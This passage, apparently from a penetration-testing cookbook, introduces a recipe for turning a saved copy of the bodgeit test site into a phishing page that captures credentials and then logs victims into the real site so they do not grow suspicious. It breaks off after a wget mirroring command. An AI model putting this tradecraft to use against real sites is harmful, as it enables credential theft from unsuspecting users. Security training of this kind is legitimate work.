Using previously saved pages to create a phishing site
In the previous recipe, we used SET to duplicate a website and used it to harvest passwords. Sometimes, duplicating only the login page won't work with more advanced users; they may get suspicious when they type the correct password and get redirected to the login page again or will try to browse to some other link in the page and we will lose them as they leave our page and go to the original one.
In this recipe, we will use the page we copied in the Downloading a page for offline analysis with Wget recipe in Chapter 3, Crawlers and Spiders, to build a more elaborate phishing site, as it will have almost full navigation and will log in to the original site after the credentials are captured.
Getting ready
We need to save a web page following the instructions from the Downloading a page for offline analysis with Wget recipe in Chapter 3, Crawlers and Spiders. In short, that can be done through the following command:
wget -r -P bodgeit_offline...